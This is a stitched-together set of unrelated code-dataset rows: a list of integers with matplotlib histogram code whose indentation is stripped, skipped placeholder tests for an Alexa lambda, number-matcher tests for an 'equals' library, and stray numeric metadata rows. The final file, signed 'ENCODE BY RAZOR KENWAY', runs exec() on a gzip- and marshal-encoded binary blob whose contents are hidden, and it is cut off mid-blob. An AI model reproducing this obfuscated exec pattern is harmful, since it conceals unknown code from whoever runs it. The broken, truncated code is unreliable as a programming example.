4, 1, 5, 8, 5, 6, 10, 5, 10, 4, 1, 4, 9, 5, 1, 3, 3, 10, 6, 2, 5, 7, 5, 1, 6, 10, 4, 8, 1, 9, 2, 7, 10, 6, 5, 5, 9, 2, 3, 8, 7, 9, 9, 6, 6, 4, 8, 8, 8, 3, 6, 10, 5, 8, 6, 3, 7, 8, 4, 6, 1, 7, 3, 10, 3, 8, 9, 1, 7, 5, 7, 2, 5, 8, 6, 4, 8, 4, 1, 4, 10, 6, 9, 2, 2, 3, 7, 8, 6, 3, 10, 9, 2, 2, 3, 1, 3, 1, 1, 5, 8, 2, 5, 3, 7, 2, 8, 3, 8, 5, 1, 1, 2, 1, 10, 4, 10, 6, 4, 5, 4, 4, 5, 4, 1, 4, 4, 3, 5, 2, 1, 1, 6, 8, 10, 2, 10, 5, 6, 8, 10, 3, 2, 8, 4, 2, 4, 2, 9, 9, 6, 9, 1, 2, 6, 9, 10, 2, 1, 6, 9, 
10, 3, 4, 9, 6, 2, 7, 1, 7, 3, 4, 4, 4, 8, 8, 7, 2, 4, 9, 8, 2, 3, 3, 4, 7, 1, 10, 10, 8, 9, 5, 2, 7, 5, 5, 5, 3, 5, 9, 6, 10, 9, 8, 1, 8, 6, 2, 4, 8, 4, 7, 8, 8, 1, 9, 6, 6, 5, 10, 7, 7, 6, 8, 6, 7, 8, 9, 3, 6, 1, 5, 7, 10, 10, 10, 8, 4, 5, 2, 10, 9, 1, 9, 5, 4, 7, 7, 10, 8, 6, 4, 7, 6, 4, 1, 8, 6, 9, 3, 10, 8, 2, 2, 2, 9, 3, 10, 8, 5, 9, 2, 4, 4, 10, 2, 9, 4, 1, 10, 4, 8, 10, 2, 10, 2, 1, 1, 7, 8, 1, 7, 7, 9, 5, 4, 7, 6, 3, 3, 5, 5, 3, 6, 5, 4, 4, 1, 10, 7, 2, 5, 8, 6, 7, 6, 5, 7, 7, 10, 4, 10, 7, 6, 3, 1, 7, 8, 1, 2, 7, 1, 1, 3, 10, 6, 7, 3, 2, 4, 1, 6, 8, 7, 10, 5, 1, 5, 8, 7, 9, 6, 8, 8, 5, 4, 9, 7, 4, 3, 5, 7, 8, 7, 10, 6, 1, 9, 7, 5, 2, 3, 4, 8, 8, 2, 1, 6, 5, 9, 9, 2, 7, 8, 4, 5, 2, 7, 6, 7, 3, 10, 6, 8, 5, 4, 9, 8, 10, 1, 3, 8, 3, 7, 3, 5, 9, 1, 6, 8, 2, 4, 6, 5, 8, 6, 7, 4, 3, 5, 7, 9, 5, 4, 2, 6, 3, 9, 7, 10, 4, 7, 5, 2, 6, 8, 9, 3, 6, 3, 5, 3, 4, 9, 5, 10, 8, 6, 6, 3, 8, 3, 6, 8, 1, 2, 5, 8, 9, 4, 10, 9, 6, 7, 2, 8, 5, 4, 4, 8, 4, 10, 9, 8, 4, 8, 6, 3, 4, 8, 3, 10, 1, 9, 1, 4, 3, 4, 1, 7, 5, 7, 6, 4, 6, 4, 4, 5, 9, 1, 5, 1, 3, 5, 7, 7, 9, 1, 5, 5, 3, 5, 10, 8, 1, 3, 2, 8, 10, 1, 2, 4, 6, 2, 2, 2, 1, 2, 4, 5, 6, 2, 7, 2, 9, 2, 8, 8, 5, 8, 6, 2, 2, 9, 3, 10, 5, 8, 9, 6, 3, 8, 1, 4, 5, 4, 9, 9, 2, 5, 8, 4, 1, 7, 10, 3, 2, 10, 7, 9, 4, 4, 4, 8, 3, 6, 8, 9, 10, 9, 2, 7, 6, 6, 5, 3, 2, 10, 9, 5, 7, 7, 10, 7, 10, 5, 10, 9, 2, 5, 8, 2, 5, 1, 1, 10, 5, 3, 1, 2, 7, 9, 9, 9, 5, 8, 3, 3, 9, 1, 1, 7, 9, 7, 2, 7, 3, 7, 1, 2, 2, 2, 7, 5, 7, 3, 7, 3, 10, 3, 1, 9, 5, 5, 1, 3, 5, 2, 10, 2, 2, 1, 10, 3, 9, 7, 3, 8, 3, 10, 1, 3, 2, 1, 9, 5, 1, 5, 10, 5, 2, 9, 3, 9, 1, 1, 3, 10, 8, 2, 7, 5, 2, 1, 5, 8, 7, 1, 7, 7, 10, 5, 9, 9, 1, 1, 3, 8, 5, 9, 9, 2, 5, 7, 9, 9, 1, 2, 10, 10, 2, 10, 9, 2, 5, 9, 1, 5, 5, 8, 7, 8, 3, 8, 5, 1, 3, 7, 8, 3, 2, 2, 5, 1, 9, 9, 2, 2, 5, 2, 9, 2, 3, 2, 7, 7, 1, 7, 8, 7, 2, 5, 9, 10, 1, 1, 1, 3, 3, 7, 10, 5, 10, 5, 5, 1, 5, 2, 3, 8, 1, 2, 2, 10, 1, 1, 1, 5, 5, 2, 2, 8, 3, 2, 1, 10, 3, 5, 3, 1, 2, 8, 3, 3, 2, 8, 5, 1, 2, 8, 3, 8, 1, 8, 3, 2, 1, 1, 2, 
1, 2, 8, 2, 3, 8, 8, 1, 1, 1, 2, 8, 3, 8, 2, 2, 2, 8, 8, 2, 2, 2, 2, 2, 2]
# import matplotlib.pyplot as plt
# fig = plt.figure()
# ax1 = fig.add_subplot(141)
# ax2 = fig.add_subplot(142)
# ax3 = fig.add_subplot(143)
# ax4 = fig.add_subplot(144)
# ax1.hist(mec4)
# ax2.hist(mec5)
# ax3.hist(mec6)
# ax4.hist(mec7)
# plt.show()
import matplotlib.pyplot as plt
fig = plt.figure()
ax1 = fig.add_subplot(241)
ax2 = fig.add_subplot(242)
ax3 = fig.add_subplot(243)
ax4 = fig.add_subplot(244)
ax5 = fig.add_subplot(245)
ax6 = fig.add_subplot(246)
ax7 = fig.add_subplot(247)
ax8 = fig.add_subplot(248)
import numpy as np
color = ['g-.^', 'r-.o','b-.s', 'k-*']
def plot_me(no, y, col, ax, id_):
ids = range(3)
l_ids = range(3,7)
lab = [0,3]
freq = {i: y.count(i) for i in set(y)}
a, b = list(freq.keys()), list(freq.values())
ax.bar(a, b, label=f'{no} MEC', color=col[0], alpha=0.3)
ax.plot([1] + a + [no], [0] + b + [0], col, lw=2, alpha=0.6)
ax.tick_params(axis="x", labelsize=15)
ax.tick_params(axis="y", labelsize=15)
if id_ in lab:
ax.set_ylabel('No of Requests', fontdict={'weight': 'bold', 'size': 18})
if id_ in l_ids:
ax.set_xlabel('No of MECs', fontdict={'weight': 'bold', 'size': 18})
ax.set_xticks(np.arange(min(y), max(y) + 1, 1))
if id_ in ids:
ax.set_title(f"Distribution for {no} MECs", fontdict={'weight': 'bold', 'size': 20})
def plot_text(ax, text):
ax.text(0.6, 1, text, rotation=0, fontsize=70,
ha="center", va="center", bbox=dict(boxstyle="round", facecolor='#FFFFFF', ec='black'))
ax.set_ylim(top=2)
ax.set_xlim(right=2)
ax.axis('off')
axs = [ax2, ax3, ax4, ax6, ax7, ax8]
dt = [mec4, mec7, mec10, h_mec4, h_mec7, h_mec10]
nos = [4,7,10]
for i in range(len(dt)):
plot_me(no=nos[i%3], y=dt[i], col=color[i%3], ax=axs[i], id_=i)
t = {ax1: r'$Exp_1$', ax5: r'$Exp_2$'}
for k,v in t.items():
plot_text(k,v)
plt.show()
| 851.934211
| 13,162
| 0.385794
| 23,754
| 64,747
| 1.049928
| 0.005767
| 0.142662
| 0.213994
| 0.074419
| 0.82923
| 0.75409
| 0.70413
| 0.625662
| 0.610184
| 0.444988
| 0
| 0.490571
| 0.246482
| 64,747
| 75
| 13,163
| 863.293333
| 0.02062
| 0.003537
| 0
| 0
| 0
| 0
| 0.002527
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.04
| 0
| 0.08
| 0
| 0
| 0
| 1
| null | 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4feabff4afd8ecac938dea0048c93421ebe37d49
| 236
|
py
|
Python
|
bot/starpruuuft/__init__.py
|
PruuuGames/StarPruuuft
|
865bc7f897ccb97d1ca4334ea7a1621a38285a35
|
[
"MIT"
] | 1
|
2018-07-07T08:09:44.000Z
|
2018-07-07T08:09:44.000Z
|
bot/starpruuuft/__init__.py
|
PruuuGames/StarPruuuft
|
865bc7f897ccb97d1ca4334ea7a1621a38285a35
|
[
"MIT"
] | null | null | null |
bot/starpruuuft/__init__.py
|
PruuuGames/StarPruuuft
|
865bc7f897ccb97d1ca4334ea7a1621a38285a35
|
[
"MIT"
] | 2
|
2018-07-07T20:32:14.000Z
|
2018-07-08T22:09:37.000Z
|
from .agents import StrategyAgent
from .agents import BaseAgent
from .agents import BuilderAgent
from .agents import WorkerAgent
from .agents import MilitarAgent
from .agents import DefenceAgent
from .agents import AttackAgent
| 26.222222
| 34
| 0.813559
| 28
| 236
| 6.857143
| 0.357143
| 0.364583
| 0.583333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15678
| 236
| 8
| 35
| 29.5
| 0.964824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8b217b9e130c981ce28384615ac103cd5f954d57
| 1,225
|
py
|
Python
|
lambda/us-east-1_alexa-where-is-tim-0a33c80c982c/test_lambda_function.py
|
tdmalone/where-is-tim
|
e32c1cc8c9561b65c76f2e891435c9f0f382b0ce
|
[
"MIT"
] | 1
|
2018-12-30T05:34:43.000Z
|
2018-12-30T05:34:43.000Z
|
lambda/us-east-1_alexa-where-is-tim-0a33c80c982c/test_lambda_function.py
|
tdmalone/where-is-tim
|
e32c1cc8c9561b65c76f2e891435c9f0f382b0ce
|
[
"MIT"
] | null | null | null |
lambda/us-east-1_alexa-where-is-tim-0a33c80c982c/test_lambda_function.py
|
tdmalone/where-is-tim
|
e32c1cc8c9561b65c76f2e891435c9f0f382b0ce
|
[
"MIT"
] | null | null | null |
from pytest import mark
import lambda_function
@mark.skip(reason="TODO: Need to write")
def test_maybe_get_invalid_date_response():
pass
@mark.skip(reason="TODO: Need to write")
def test_get_newest_valid_event():
pass
@mark.skip(reason="TODO: Need to write")
def test_get_speech_text_response():
pass
@mark.skip(reason="TODO: Need to write")
def test_GetLocationHandler_can_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_GetLocationHandler_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_FallbackIntentHandler_can_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_FallbackIntentHandler_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_SessionEndedRequestHandler_can_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_SessionEndedRequestHandler_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_CatchAllExceptionHandler_can_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_CatchAllExceptionHandler_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_RequestLogger_process():
pass
@mark.skip(reason="TODO: Need to write")
def test_ResponseLogger_process():
pass
| 21.491228
| 49
| 0.770612
| 174
| 1,225
| 5.206897
| 0.195402
| 0.11479
| 0.200883
| 0.258278
| 0.856512
| 0.856512
| 0.856512
| 0.856512
| 0.856512
| 0.816777
| 0
| 0
| 0.112653
| 1,225
| 56
| 50
| 21.875
| 0.833487
| 0
| 0
| 0.634146
| 0
| 0
| 0.201797
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.317073
| true
| 0.317073
| 0.04878
| 0
| 0.365854
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 11
|
8b45a0b76eb99cfe62d1779128618264700bb5b9
| 3,652
|
py
|
Python
|
test/number_test.py
|
toddsifleet/equals
|
fb2b2a027e5389fdeb2f59e9acbdcacb8a8cdfb4
|
[
"MIT"
] | 38
|
2015-03-18T21:45:33.000Z
|
2020-12-22T11:13:05.000Z
|
test/number_test.py
|
toddsifleet/equals
|
fb2b2a027e5389fdeb2f59e9acbdcacb8a8cdfb4
|
[
"MIT"
] | 8
|
2015-02-12T04:06:37.000Z
|
2022-02-10T08:30:08.000Z
|
test/number_test.py
|
toddsifleet/equals
|
fb2b2a027e5389fdeb2f59e9acbdcacb8a8cdfb4
|
[
"MIT"
] | 4
|
2015-02-25T16:54:00.000Z
|
2016-09-07T20:10:09.000Z
|
from equals import any_number
class TestLessThan(object):
test_obj = any_number.less_than(5)
def test_equals_a_smaller_number(self):
assert self.test_obj == 4
def test_does_not_equal_same_number(self):
assert not self.test_obj == 5
def test_does_not_equal_larger_number(self):
assert not self.test_obj == 6
def test_order_of_test_does_not_matter(self):
assert 4 == self.test_obj
def test_representation(self):
expected = (
"Any instance of <class 'numbers.Number'> "
"less than 5"
)
assert str(self.test_obj) == expected
assert repr(self.test_obj) == '<Equals {}>'.format(expected)
class TestGreateThan(object):
test_obj = any_number.greater_than(5)
def test_equals_a_larger_number(self):
assert self.test_obj == 6
def test_does_not_equal_same_number(self):
assert not self.test_obj == 5
def test_does_not_equal_smaller_number(self):
assert not self.test_obj == 4
def test_order_of_test_does_not_matter(self):
assert 6 == self.test_obj
def test_representation(self):
expected = (
"Any instance of <class 'numbers.Number'> "
"greater than 5"
)
assert str(self.test_obj) == expected
assert repr(self.test_obj) == '<Equals {}>'.format(expected)
class TestLessThanOrEqual(object):
test_obj = any_number.less_than_or_equal_to(5)
def test_equal_equals_a_smaller_number(self):
assert self.test_obj == 4
def test_equals_same_number(self):
assert self.test_obj == 5
def test_does_not_equal_larger_number(self):
assert not self.test_obj == 6
def test_order_of_test_does_not_matter(self):
assert 4 == self.test_obj
def test_representation(self):
expected = (
"Any instance of <class 'numbers.Number'> "
"less than or equal to 5"
)
assert str(self.test_obj) == expected
assert repr(self.test_obj) == '<Equals {}>'.format(expected)
class TestGreateThanOrEqual(object):
test_obj = any_number.greater_than_or_equal_to(5)
def test_equals_a_larger_number(self):
assert self.test_obj == 6
def test_equals_same_number(self):
assert self.test_obj == 5
def test_does_not_equal_smaller_number(self):
assert not self.test_obj == 4
def test_order_of_test_does_not_matter(self):
assert 6 == self.test_obj
def test_representation(self):
expected = (
"Any instance of <class 'numbers.Number'> "
"greater than or equal to 5"
)
assert str(self.test_obj) == expected
assert repr(self.test_obj) == '<Equals {}>'.format(expected)
class TestBetween(object):
test_obj = any_number.between(1, 3)
def test_equals_value_in_range(self):
assert self.test_obj == 2
def test_does_not_equal_value_larger_than_max(self):
assert not self.test_obj == 4
def test_does_not_equal_value_smaller_than_min(self):
assert not self.test_obj == 0
def test_does_not_equal_value_equal_to_max(self):
assert not self.test_obj == 3
def test_does_not_equal_value_equal_to_min(self):
assert not self.test_obj == 1
def test_order_of_test_does_not_matter(self):
assert 2 == self.test_obj
def test_representation(self):
expected = (
"Any instance of <class 'numbers.Number'> "
"between 1 and 3"
)
assert str(self.test_obj) == expected
assert repr(self.test_obj) == '<Equals {}>'.format(expected)
| 28.53125
| 68
| 0.655531
| 509
| 3,652
| 4.363458
| 0.104126
| 0.116614
| 0.158487
| 0.063035
| 0.917154
| 0.897794
| 0.881135
| 0.774876
| 0.746961
| 0.72715
| 0
| 0.012445
| 0.251917
| 3,652
| 127
| 69
| 28.755906
| 0.800512
| 0
| 0
| 0.633333
| 0
| 0
| 0.095564
| 0
| 0
| 0
| 0
| 0
| 0.355556
| 1
| 0.3
| false
| 0
| 0.011111
| 0
| 0.422222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8c94eb607fa4e2d3ae5954ac7a0a9a978cbc8ba1
| 116,615
|
py
|
Python
|
main.py
|
B4BY-DG/R-Bomber
|
bb0915b65fedf16754f67f3b2a6702a2ea3c4257
|
[
"MIT"
] | null | null | null |
main.py
|
B4BY-DG/R-Bomber
|
bb0915b65fedf16754f67f3b2a6702a2ea3c4257
|
[
"MIT"
] | null | null | null |
main.py
|
B4BY-DG/R-Bomber
|
bb0915b65fedf16754f67f3b2a6702a2ea3c4257
|
[
"MIT"
] | null | null | null |
#ENCODE BY RAZOR KENWAY
#YOU CAN TRY THIS DECODE GOD BLESS
import gzip,marshal,zlib,base64,binascii,lzma
try:
exec(gzip.decompress(marshal.loads(b'st\x9f\x00\x00\x1f\x8b\x08\x00\x7f\x9f\xe7a\x02\xffd]\xd7Z\x15M\xb4\xbc?O\x01\x88\n\x820=y\x08\x92$#AD\x04\xb6\xc0DrF@D\x9e\xfd\xec\xaa\xaev\xff\xdf9\x17Fv\x98\x99\xee^\xa1V\xadZ\'\x17\xd7W\xb7\xf7]E~W\xc7\xe1\xe0E~{w\x9c\x9f\x0f\x16\'\x97\xf9]yr2x\xf4|r=\xf8|~R\xfc\xcf\xfd\xed\xef\x91\xfa\xa9.\xfb\xf4\x9a\xa1\xf3\xab\xbc\xba\xeb\xc3\x0b\x86\xaa\xba\xbc\xba\xb8\xbe\xad\xef\xee\xfa\x8a\xf7\xad\'\xd3\xb4\x9e\xd2\xa2\xf5\xe4\xa5\xed_^\xeb)i\xff;k\xff\xaa\x93\xbc\xfd\x1f~\xeb\xa9iZ\xad\xf6\x7f\x05\x9b\xed\xdf\xbc!\xfb\xa2\xbcn\xff\xaaZOU\xfb\x8dE|Q\xb6\x7fO.\xda\xef)\xf9O\xfb\xffU~\xe1^\xd0\xfe\x86\xf6\x8b\x8b\xe6\xdf\x7f\xb8\xbf\xd4\xc1]\xfbo\xf5\xe5\x87\xd6S\x99\xe1C\xda\x1f\xdb\xfe\xda\xa2\xfd\xb5\xa6\xfd\x15\x8d\x8f\xefl\xff\x1d\xd7\x16\xb4\xff]\xd9\xeb\xf3L\xfb\xef\x81\xbdN\x83K,\xd7\xb2?\xed?pU\xed\x8f\xc82{\x95\xeeO|\x95\xe7\x9d\xd8\xf7\xf3~\xdb\xef/\xa2\xf6\x9f\x1eno\xbe\xfd\x9f\xdeG\xfbM\r>\xd1|k\xbf\xbe\xfd\x9e&\xd4\xd7\xb5\xff\xac\x02=\x8d\xf6\x9fi\xd8\xfe\x12/\xe2o\xed\x0bo\x7fk\x9ax\xfaG\x85\x7f\x84\xb8\xc4~|\xa9\x9e\x97W\xdbw{1~}\xb5\xdfS6\xed\xef1\x99\x1e}\xfb\xd1\x95\xed?M\xfb\xbde\xfb\x11\xa4\xed\xef1\tn}\xc1^\x8c\xc9\xeds\xe0\x8b\xda?\xac\x8c^\x1c\xeb\x02C\xfc{\xc4\xbe\x18/\xf2\xc2\xc1\xf6o\x89\xbd\x8d\xa6\x19k\xdf`\x8e\xbf\xdc\x9cL\x9d\xcd\xd8+\xa8\xf0\xd3\xc2\xded\xfbKo\xdb\xff\x93\xe2\xf74\xb5\xdf\xd7\x94\xf6W\xd1\xd8\x87X\xa6\xd9\xb6}\xcc\x1e\x1fGO\xfb\xa5\xed\x1f\xa7\xbe\x9eM\xfbWY\x8cF\xf6\x82\x9a\xf6\x9dU\xd1\xcd\xe6C\xfb\xaf\\\xbf\xedz\xef\'>\x07\x0b_\xe8\xe7\xf8\xe0\xd2^|U\xd9\xbf\x17\xb5\xdd_\xf8y\x86\xab\xc4\xb77\xed\x0f\xcd\xf0\xa6\xe8\xf8\x11\x1b\xd4|\x0b\xce\xba~`\xad\xda/6\xb8\xb2\x05\xdd,.\x1b\x1b.x\xb2\x1f\x9b\xea?K\xa3{\xc1>\n\x96\xf1\x1d+\xed\xdf\xc2\xf3\xf6o\xde\x97{\xbb9\xf00\xf0PJ\xaf}\xd5u\xb3m\xd7\xa6\xccb\xdc\xf5\xf6\x02>\x05?\xa8\xb7\xed3\xc2\x1a\xe0g\xfc\xb3\xc6!i\xbf\x02\xfb\n\x9b7m\xec\n\xa6\xb8\x99\xb4\xde\x9e\xc6\xfd\xd6\x7f\xb0\xee\xfc\r\xdfb\x7f\xa5^_\xfbCc\xbb\xff\xd3`\xae\xfd:o\x12
\xbf\xadL\xb5/\xae\xfd\xc2\xbcX\xbb.q\xc5k\xd7\xf6.\xb9Cp3\xd8\x01Us>\xd4^\xd0\x02;=<\x1c\xc7\xd2>\xde\xe2\x82\xdf\xd8\x07\x89\xc5\xc0C\xe5\x8a\x86v%\xf1\xa9M\xb5\xad\xb3\x11h\xc7\x14\x0b\xa6K\xf7M\x13\xd0~"u\xfb\xd6<\x1c\\\x9c\xe0\xdc\xeb\xe2\x16y*\xb8\xea]\xd7\x7f\xec!3\xe9\xc6\x15\x9e\xf4[\x1d\xe3\xa6j\xdfC\x8d\x07\xe4s\x97\r\xda%\xc0j\x17\xe9n\xfb=\xb8\xcf\xb8\xbd#\x9b\x84\x97x[\x7f\xb3\xcf\xbf,\x17\xecV*\xcbw\xf6+\xb1\xd92\\\x07\x8f\xfds\xfb\xfes\x7f\xbf\xfd\xcf\xf6\xc7\xe5\x99]M|l\x1a\xd9\xf7\xe5\x9e\xfe\xe4\x8e\xc3\xd5F\xf6\x05e\xfb\xc6\xf3\xc0\xee\xd5\xaa\xb8\x82\xdd8\x91q\xc9t\xf4K\xfb\\\x8bz\xdf.\x0f\xbe\x1a\'\r\xfb\x0b{\x0f\x9f\r\xab\x81g\xd9D\x9f\xb0\xd7\xed\xe9\xa6q\xab\xadm\xf0\xbcU{\xb6\xd2\xfc\x15\x86\xf5\xd5>\xde\xda\xc7K>\x85\x13\x7fv\xed\xd9\xf6\xbc)\xec,\x18\xb1d\xc3~\x07.\r\xbb\x15\x1f\xc5\xbf\xc3\xfa%\x9f^\xf0\x86\xfe\xf6N0\x85\xde\xd0\xbc\xc2\xd4N\xb6\x7f\\{\xd6P\xe2\xfa\x8b\xfc\xab=+Y\xd8|{\xb0\xc6\x01w\x9e\x87\xfb\xed\xa7Vd\xf6\tW\x196\x88g?\xbd\xae\x7f^\xdb\r\x8f\x1d\x0c;\xed\x99!]\x0c>9\xf17d\x12\xab\xech\xde\x9e!\xec\xf3\xaa\xfday9\x82\xfdg-#\xf6z\x81\xc3V\x0c\xb7\xdf\x80WE\x03v\xffT\xd1\x99=\xd6e}\xb6\x0fC\xb8g\xff\x1fV\xb3\x86Y\xab3\x9c\x0ek\xdb\x8af\xef\x08\xc6\x18\x07\xe5#Vc\xc0\xbe\x08\xb7\xe1\xe1\xbbL\xec\xef\xda\x0b\xc5\xb9\xc1q\xc1\x8f\xb0\x9d\xb0`\xb84\x98\x9a"\x99\xc0\r\x8f\xda\x9f\x1a\xff\xad\x8e\x1a\x0eM\xd46\x1a\xa5o\x0fF\xd5|n\xdd\xe3ta\xe9>\xd9=\x02CS\xcai\x15M\xaf\xb50\xf8\x8f\xda\xbd\xc2\xe8\x15\xf8\xb3\xc63\xceR{\n\x8at\xc9Z6\xdew\x8a\xd5(\xba\xc3U\xbbq\xd2\xfc?\x7f\xa6}}\xf6*\x9ab<\x92\x11\xc8y&\xec\xdd\xc3l`\xb1p\xa4\xb1\xb4\xf0\xcf\xb9\x99\xc4\'\xec\xdb\x8b\xc8\xb2i\xec\xdc\x1e\xfd-\xa7\x81\xd2\x9e\xc1\xd3\xcc\xbd\xf1\xc2\x9a\x08<\x94\xbcy\xe7\xbf\x9b\xf8\xf1s\x1f\x0f\xb6\x7f\x1f\xaf\xbdho\xa8\x1a\xa6*\xb8\xfd\x84;\x1d\xb4\x87\x11\xfb\x1d\x97\x98\xf9\x87\xd8]=\xc7\x95\xdd\xbfX\\\x93,\xdbs\x88M\x9aE\xd6Z6\xfcz\x98\xf0(\x86\x87\x19\xc3\xa1\xdf\xb0\xaf1\xe9#\x1e\xd5\'\xec\xd6\x19]\x17\xcc@nm\x12\x9caf\xec\x19.r\xfb\x0c\x
e1\xa2\xea\xe8\xc1\x1e4\x98\xd2:\x80{\xf2\x82g,\xc98W\xf4\xfd\x98\xbd\xf4\x1a\x1b\xbf\xd4\xe6\xc7\xb9LmP\x92ay}\xbb\xa7=\x1f\xce\xb6Z\xb3?MM\x8f]n\x1c\xa3\x9a\x1b\xca\xdc\xe2\x9e^\xf0\xe9c{:?07\xe5\xba\xbd`\xbc\xa8\xf02y \xef\x9b\r `+\xe8\x80#\xb9\'8J\x13}\x9a\x9e\xc0\xb7\x1d\xd8\x08\x03\x87\xb3\xe1\xf3[\xfd\xf5\x08s\x0e\xa71\x8b5:Y\xff0\xa5U/\xde\xd8\x87\x80\x17\xe3\xe1\xe0Q\xe6\xa1\xa2,\xc5\x1bx8\x15\xb7[{y/\xf1\x9a\xd2Z$On\xb4)p\x03\xfe\x93}K\x8a\xa8 \x91\xad\x88\xfa~\xd9\xa7U%\xdc\x16\xd8\xb8\xe5\x92l\xa2\xdf\x03;\xeem\xc4\x95utY\xb3\x92\xbb\xbf\xe1\xb0\xfa\x0br+M\x9c\xdd\x96v\'\xe0\x89\xe3\xfb\xcbj{\xef\xa3\x8en\x9d\x1c\xbc\xc1=\xe3\xb8`\xef\xd7\xdf\xdb\xef\xab\xac\xc7a\xd0\x81k7[\xf8j\x050\xb0\xec\xe6^\xb7\xda\xec\xda-^\xd7\'\xd6\xbd\x18\xdc\x0f\x1e!\xdd\x94o\x0f\xa1A\x88\x84h\x0f\xf7P\x9b\xaf\\\xce9\xfb\x86RK\xdf\x9870-?\xe0\xa1\xf0\xc8q,\x92\x8bQ\xac:\xccq]\xf7\xb8\xc3Vo\xef2\xee\xb9\xc4\x82\xe2\xdc\xfb?.w{\xf8Pp\x84\xf1=\xb4\x17\xf1\x15\xfc\xc6\xca\xb7\x9e\xcf\x1f\xac\xdbcL\x11\xb5OG\xc6\xe7\x8cG\x04\x03\x80\x03R#\xc8B\x18\x93\x99\x13\xac\xc7\xe0\x97C|>\xf69\xcc])\x0f\x8fO\xc0\xc52PCd\xd2|\x91\x89L\xce`\xb6\xb1\xb1\xaab\xd2\x86\x13\r\x0c\x1a\x1eN\xe1V\xb5Y\xc6G\x95\xdd\xf6\xe1\x15\xde\xb5}\xbeE\xb0`\xad_Z\x0c\x05\xf6\x9aL\xb2d\x0f\x10\xe3\x13\\\xb7Y\xc7\xd1K\xac[\x87\x83\xc05T\x88\x11\x92\x1eD\xf9\xf0L0\x038\x02\x95\x12\x03X\xd7\x1a!\x0b\xce\x18\xddxf\xb7k\xca\x8ca\xe4\xd5.g^\xec\xa4g\xabx\xe6\xfb\xf0\x88\xb1\xceQ`\xfd(\xfds}\x9b\xb4}F\x1e\x05\xd6w\xa7\xe1\xa5\xddJ\xb0#uS\x1e\xd9 \xa84\x83s{\x8a\xd9\xf0\x8d\xe9\x97\xb5\x11\x98\xe929\x80U\x87]I\xcan\xc4\xeb\xbe=\xe4\xb7=\x7f\xd6\'q)o>\xc3\xe6e\xf6\x17#\xf1\x82&\x16\xcb8\xbd][\'\x81+\xaf\xbd\xf0\x83\x1e\x91\x1c(\x0cy\x99>\xecj\xaf\xe6\x13\xd6\xc2\x95M\xcf\xba\xddF\xb5wk\xef\x1c\xbb\xb0\x89W\xbf(\xa07\x88\x97\x11\xf4 
\xdc)\xcd\x95\xfd\xb8\xf6\x03\xc1\xd3\x0c\x97\xf1\xf8\x9ad\xdb\x1eJ<\x08\x98\xa1\xa2\x18\x0b\xad\x91\xc7\x87\xc13\xe7\xc6\xff\x85\xb5\x0c\xec\xee(\xb2\xaf\x8b\xb0\x87\x08\x86\xb0\xd5J\x97\x0b\xa5J7"\x1b\xa0\xe1z\xca\xf0\xb7\x16\xb89\xb1g\xde\xf36\xad\xfd\xa5\x871:\xaf\xdc\xa4\xca}\xf0\xde\xa2\xfa\x8ds0\xa0\x80\x97\xc1v\xc0-v\tc\x8e\xa7\xd4\x1c\xc9.\xd5\xf6\xfa\xe1\xa23\xba\xab\xb7v\xe7z\xbc\xa6E\x989O\t_\x9dX{\xe5\x85Cx\x1eY\x1fn\xb9K\x1b\xa18\xb6\xc19\x02\x0c\x84]E\xfc\xc3^\x10?\xb9T\xc4\x07\x8b[n\xd8\xbb\xab\xa2Wkc\xe04\xf2\xea\x94\xc6\x06O0l]>\xe3\xa0-|\xc2VYT\xe4Wh\x0b{6Z2\xde\xf5\x9a}&&X=?e\xd8q\x83\xc5\x1eP\x0e\xe5B\xd9\xc2\x9a\x85\xa69\x96\x91+\xa6qa\x03v\xd3\xd3\xb2\x04\x8c\xb6\xbb\x0f\x8f\xa3\xadg\x1bV\xf2"\xeb\xfa\x03\xbf\xeb\xfd\x8e\x92\x1180,K=\x8d\xdd\x9d}\x80M\xeeB\xe4\x82\xcfY\xbe\xb1>\x03o\xaf\xa3\xcc\xde,\xf7^F\xdf\xfd\xfe\xa7\xf5\x13m_\xd2\xd8{\xc6.\xe4\xe9\x83\xdb\xa9\x8bA\\\xd1w\x9c\xe6\xef\xb36\xaaL\xebq,\x86\x02X\xfa\xf0\xea\xc3\xdcg{\x08\xf8\x82\xc2\xba\xc4\n\x01\x11\xa2)\xc4\xce\xf0\x9d\xdc\xb1p7\xd9\xd1\x02\xbev\x16\xa1_\xf4\x16\x06\xf9\xee\x16\xc7\xf7\xaf5(&\xb8\xb6\xcb\x86\xc0\xb